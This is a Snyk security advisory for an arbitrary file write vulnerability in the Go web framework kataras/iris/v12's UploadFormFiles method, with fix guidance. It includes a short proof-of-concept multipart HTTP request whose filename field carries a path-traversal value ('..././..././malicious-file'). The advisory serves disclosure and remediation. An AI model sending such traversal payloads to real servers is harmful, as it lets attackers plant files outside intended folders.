Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade github.com/kataras/iris/v12
to version 12.2.0-alpha8 or higher.
github.com/kataras/iris/v12 is a fast, simple yet fully featured and very efficient web framework for Go.
Affected versions of this package are vulnerable to Arbitrary File Write. The unsafe handling of file names during upload using UploadFormFiles
method may enable attackers to write to arbitrary locations outside the designated target folder.
Based on the upload-files example.
POST /upload HTTP/1.1 Host: localhost:8080 Content-Type: multipart/form-data; boundary=----xxx Connection: close Content-Length: 151
------xxx Content-Disposition: form-data; name="uploadfile"; filename="..././..././malicious-file" Content-Type: text/plain
pwned ------xxx--
Note: the vulnerability is only possible in Go < 1.7.5 due to unsafe net/http
behaviour.